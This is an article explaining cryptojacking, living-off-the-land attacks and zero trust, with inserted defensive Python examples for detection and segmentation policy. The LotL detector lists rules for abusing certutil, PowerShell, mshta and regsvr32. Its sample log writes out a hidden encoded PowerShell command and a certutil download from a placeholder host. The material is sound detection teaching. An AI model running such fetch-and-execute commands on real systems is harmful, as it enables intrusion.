Pop quiz, cybersecurity hotshot:
- Does your organization have a plan in place to prevent “cryptojacking?”
- What techniques are you deploying to defend against attackers “living off the land” (LotL) on your network?
- Have you deployed a “zero trust” strategy in your environment to address insider threats?
These were some of the questions being posed to attendees at CDW’s recent Protect SummIT in Philadelphia. They caught my ear because they were all new security terms for me.
The fact that they were not familiar to me, someone who follows and writes about the security market, points to the dizzying speed of the cybersecurity industry. If your security posture is not staying up to date to meet these new challenges, your organization is likely at risk.
So because this may be the first time you are hearing these terms, too, let me break them down for you.
Cryptojacking Bogs Down Machines
Cryptojacking is the unauthorized use of a computer’s CPU resources to mine cryptocurrency. The cryptomining software is introduced either by code injection or through a phishing attack. It’s a very easy, low-risk and passive way for hackers to mine cryptocurrency. This can harm an organization by slowing performance on users’ PCs and racking up help desk hours trying to diagnose and address the problem.
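Because the damage shows up first as slow machines, the practical defense is to spot a miner from the same telemetry the help desk would otherwise chase by hand. The following is an added example (not code from the article or from CDW): a small heuristic that scores per-process endpoint telemetry on three independent indicators the post's description implies, sustained CPU load, a connection to a mining-pool port and an unsigned binary. The port list, thresholds and all sample records are constructed assumptions for the demonstration.

```python
"""Cryptojacking detection heuristic over constructed endpoint telemetry.

Added example, not code from the article or from CDW. It assumes an endpoint
agent already collects per-process CPU samples and outbound connection ports;
every record below is constructed for the demonstration.
"""
from dataclasses import dataclass, field
from typing import Dict, List

# Ports commonly used by Stratum-style mining pools. Assumption: treat this as
# a starting point and tune it to what your own network telemetry shows.
MINING_POOL_PORTS = {3333, 4444, 5555, 7777, 14444}
CPU_THRESHOLD = 80.0   # percent of one core, per sample
MIN_SUSTAINED = 5      # consecutive samples at or above the threshold


@dataclass
class ProcessTelemetry:
    pid: int
    name: str
    cpu_samples: List[float]                     # one value per sampling interval
    remote_ports: List[int] = field(default_factory=list)
    signed_binary: bool = True


def sustained_high_cpu(samples: List[float],
                       threshold: float = CPU_THRESHOLD,
                       min_run: int = MIN_SUSTAINED) -> bool:
    """True if CPU stayed at/above threshold for min_run consecutive samples.

    Miners load the CPU continuously; a short spike from a build or a video
    call does not qualify.
    """
    run = 0
    for value in samples:
        run = run + 1 if value >= threshold else 0
        if run >= min_run:
            return True
    return False


def indicators(proc: ProcessTelemetry) -> List[str]:
    """Collect independent cryptojacking indicators for one process."""
    found = []
    if sustained_high_cpu(proc.cpu_samples):
        found.append("sustained high CPU")
    if any(port in MINING_POOL_PORTS for port in proc.remote_ports):
        found.append("connection to mining-pool port")
    if not proc.signed_binary:
        found.append("unsigned binary")
    return found


def find_suspects(processes: List[ProcessTelemetry],
                  min_indicators: int = 2) -> Dict[int, List[str]]:
    """Flag processes that show at least min_indicators indicators.

    Requiring two keeps legitimate CPU-heavy work (video encoding, compiles)
    off the help-desk queue while still catching a miner.
    """
    suspects = {}
    for proc in processes:
        hits = indicators(proc)
        if len(hits) >= min_indicators:
            suspects[proc.pid] = hits
    return suspects


# Constructed sample telemetry (not real data).
SAMPLE_TELEMETRY = [
    ProcessTelemetry(1201, "chrome.exe", [12, 30, 45, 22, 18, 40, 35], [443, 443]),
    ProcessTelemetry(2310, "updater.exe", [95, 97, 99, 98, 96, 97, 99], [3333],
                     signed_binary=False),
    ProcessTelemetry(3022, "ffmpeg.exe", [90, 95, 97, 99, 98, 96, 94], []),
    ProcessTelemetry(4100, "powershell.exe", [5, 88, 10, 91, 8, 90, 6], [443]),
]

if __name__ == "__main__":
    for pid, why in find_suspects(SAMPLE_TELEMETRY).items():
        print(f"pid {pid}: {', '.join(why)}")
```

Run as-is, only the unsigned `updater.exe` talking to port 3333 is flagged; `ffmpeg.exe` burns just as much CPU but shows a single indicator, which is exactly the false positive a one-signal rule would hand to the help desk.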
“Living Off the Land” Is Among the Latest Malware-Free Attacks
Attackers making use of LotL tactics present a growing challenge to organizations. LotL involves using native tools and features on the host computer to remain undetected while pursuing malicious objectives like exfiltrating or destroying data. This allows the hacker’s activities to hide in plain sight, blending into other legitimate activities on the network. It also makes attribution more difficult, as attackers are using the same everyday tools rather than specialized code that’s easier to attribute.
Such detection evasion techniques have grown more popular with attackers. The 2019 CrowdStrike Global Threat Report states that these kinds of malware-free attacks grew by 40 percent in 2018.
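Since LotL activity uses tools a defender cannot simply block, detection has to key on how a built-in tool is invoked and by what, rather than on whether it ran. The following is an added example, not code from the article, CDW or CrowdStrike: it evaluates constructed process-creation log lines against a few rules of the kind published in open detection content (a command-line pattern per tool, plus an Office application spawning a shell). The key=value log format, the rule patterns and the sample lines are all assumptions made for the demonstration.

```python
"""Living-off-the-land (LotL) detection over constructed process-creation logs.

Added example, not code from the article or from CrowdStrike/CDW. It assumes
process-creation events (Sysmon event 1 or Windows 4688 style) have already
been normalised to key=value lines carrying parent image, image and command
line. Rule patterns are illustrative assumptions modelled on publicly
documented detection content, not an exhaustive list.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str


# Suspicious use of built-in Windows tools: (alert name, pattern on cmdline).
LOLBIN_RULES = [
    ("certutil used to fetch remote content",
     re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b", re.I)),
    ("encoded PowerShell command line",
     re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I)),
    ("mshta launching remote content",
     re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I)),
    ("regsvr32 loading remote scriptlet",
     re.compile(r"\bregsvr32(\.exe)?\b.*/i:https?://", re.I)),
]

# Office applications rarely have a legitimate reason to spawn a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> ProcessEvent:
    """Parse one normalised key=value log line into a ProcessEvent."""
    fields: Dict[str, str] = {k: v.strip('"') for k, v in _KV.findall(line)}
    return ProcessEvent(parent=fields.get("parent", "").lower(),
                        image=fields.get("image", "").lower(),
                        cmdline=fields.get("cmdline", ""))


def evaluate(event: ProcessEvent) -> List[str]:
    """Return the names of every rule the event trips (empty list = benign)."""
    alerts = [name for name, pattern in LOLBIN_RULES if pattern.search(event.cmdline)]
    if event.parent in OFFICE_PARENTS and event.image in SHELL_IMAGES:
        alerts.append("Office application spawned a shell")
    return alerts


def run_detections(log_text: str) -> List[Tuple[int, List[str]]]:
    """Evaluate every non-empty line; return (line number, alerts) for hits only."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if not line.strip():
            continue
        alerts = evaluate(parse_event(line))
        if alerts:
            hits.append((lineno, alerts))
    return hits


# Constructed sample log (not real telemetry); example.invalid is a reserved
# name and the base64 blob is a placeholder, not a real payload.
SAMPLE_LOG = r'''
parent=explorer.exe image=powershell.exe cmdline="powershell.exe Get-ChildItem C:\Users"
parent=winword.exe image=powershell.exe cmdline="powershell.exe -nop -w hidden -enc ZXhhbXBsZQ=="
parent=cmd.exe image=certutil.exe cmdline="certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"
parent=services.exe image=certutil.exe cmdline="certutil.exe -verify cert.cer"
'''

if __name__ == "__main__":
    for lineno, alerts in run_detections(SAMPLE_LOG):
        print(f"line {lineno}: {'; '.join(alerts)}")
```

The two benign lines (an interactive PowerShell directory listing, certutil verifying a certificate) produce nothing, which is the point: the same binaries are in every hit and every miss, and only context separates them. In a real deployment these rules belong in the SIEM or EDR rule engine; the parser here only stands in for that ingestion.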
Zero Trust Model Boosts Organizationwide Security
Knowing that attackers are looking to dwell within an environment for as long as they can, remaining undetected and masking their malicious activities, organizations can no longer assume that anything within their perimeter defenses is safe. They must “never trust and always verify,” an update of the traditional security approach of “trust but verify.” This is the thinking behind a zero trust approach to security.
Zero trust defense techniques are focused on preventing the lateral movement of attackers within an environment. Many intrusions come through weaknesses in the environment’s perimeter and require movement within the network to get to the real objective of the breach. This being such a common tactic, the logical countermeasure is to make such lateral movement difficult. A zero trust strategy typically involves microsegmentation of the network and enforcing access and identity control points between segments to limit this kind of unauthorized traffic.
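What "never trust, always verify" looks like as an enforceable rule is easier to see in a small policy engine than in prose. The following is an added example, not code from the article or from any product: it models the two controls the paragraph names. Microsegmentation means a flow between two segments is allowed only when an explicit rule permits it, and traffic between peers in the same segment gets no special treatment; an identity control point means that even a permitted path is denied unless the caller's identity was verified and carries the required role. The segments, rules and flows are constructed.

```python
"""Zero trust segment-to-segment policy check, as an added example.

Not code from the article or from any product. Default decision is deny;
being "inside" the perimeter earns no trust. Segments, rules and flows below
are constructed for the demonstration.
"""
from dataclasses import dataclass, field
from ipaddress import ip_address, ip_network
from typing import FrozenSet, List, Optional, Tuple


@dataclass(frozen=True)
class Segment:
    name: str
    cidr: str


@dataclass(frozen=True)
class Rule:
    src_segment: str
    dst_segment: str
    dst_port: int
    required_roles: FrozenSet[str]


@dataclass
class Flow:
    src_ip: str
    dst_ip: str
    dst_port: int
    identity: Optional[str] = None        # caller as asserted at the control point
    identity_verified: bool = False       # did the control point actually verify it?
    roles: FrozenSet[str] = field(default_factory=frozenset)


def segment_of(ip: str, segments: List[Segment]) -> Optional[str]:
    """Map an address to the microsegment that contains it, or None."""
    addr = ip_address(ip)
    for seg in segments:
        if addr in ip_network(seg.cidr):
            return seg.name
    return None


def decide(flow: Flow, segments: List[Segment], rules: List[Rule]) -> Tuple[str, str]:
    """Return ("allow" | "deny", reason). Anything not explicitly permitted is denied."""
    src = segment_of(flow.src_ip, segments)
    dst = segment_of(flow.dst_ip, segments)
    if src is None or dst is None:
        return "deny", "address outside any known segment"
    for rule in rules:
        if (rule.src_segment, rule.dst_segment, rule.dst_port) != (src, dst, flow.dst_port):
            continue
        # The path exists in policy; the identity control point still has to pass.
        if not flow.identity_verified:
            return "deny", f"path {src}->{dst}:{flow.dst_port} permitted but identity not verified"
        missing = rule.required_roles - flow.roles
        if missing:
            return "deny", f"identity {flow.identity} lacks role(s) {sorted(missing)}"
        return "allow", f"rule {src}->{dst}:{flow.dst_port} satisfied by {flow.identity}"
    return "deny", f"no rule permits {src}->{dst}:{flow.dst_port}"


# Constructed environment (not a real network).
SEGMENTS = [Segment("users", "10.10.0.0/24"),
            Segment("app", "10.20.0.0/24"),
            Segment("db", "10.30.0.0/24")]
RULES = [Rule("users", "app", 443, frozenset({"employee"})),
         Rule("app", "db", 5432, frozenset({"app-service"}))]

SAMPLE_FLOWS = [
    Flow("10.10.0.5", "10.20.0.8", 443, "alice", True, frozenset({"employee"})),      # normal use
    Flow("10.10.0.5", "10.30.0.9", 5432, "alice", True, frozenset({"employee"})),     # workstation straight to DB
    Flow("10.20.0.8", "10.30.0.9", 5432, "app-svc", True, frozenset({"app-service"})),
    Flow("10.20.0.8", "10.30.0.9", 5432, "app-svc", False, frozenset({"app-service"})),  # right path, unverified
    Flow("10.10.0.7", "10.10.0.5", 445),                                              # peer to peer, same segment
]


def decisions(flows: List[Flow] = SAMPLE_FLOWS) -> List[str]:
    """Verdict for each sample flow, in order."""
    return [decide(f, SEGMENTS, RULES)[0] for f in flows]


if __name__ == "__main__":
    for f in SAMPLE_FLOWS:
        verdict, why = decide(f, SEGMENTS, RULES)
        print(f"{f.src_ip} -> {f.dst_ip}:{f.dst_port}: {verdict} ({why})")
```

Of the five constructed flows only two are allowed. The three denials are the lateral-movement cases the paragraph is about: a workstation reaching for the database directly, the legitimate app-to-database path used without a verified identity, and one workstation talking to another inside the same segment, which a perimeter-only design would have waved through.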
Making the Case for Security Budget
Is your head spinning? The velocity at which these new attack techniques develop really puts some perspective on the notion that security is not an end zone that you cross and then you’re safe. It is a process, an ongoing, ever-evolving business need that requires constant attention — and budget.
This brings me to another observation from the Protect SummIT. I overheard conversation after conversation among security professionals mentioning the difficulty of securing sufficient budget to protect their organizations… in 2019. And while progress is being made — Radware reports that 98 percent of C-suite executives recognize that they have some management responsibility for security — these conversations point to a need for continued advancements in bringing business executives into alignment with security needs.
Maybe they need to take the pop quiz to really see the risk that’s out there.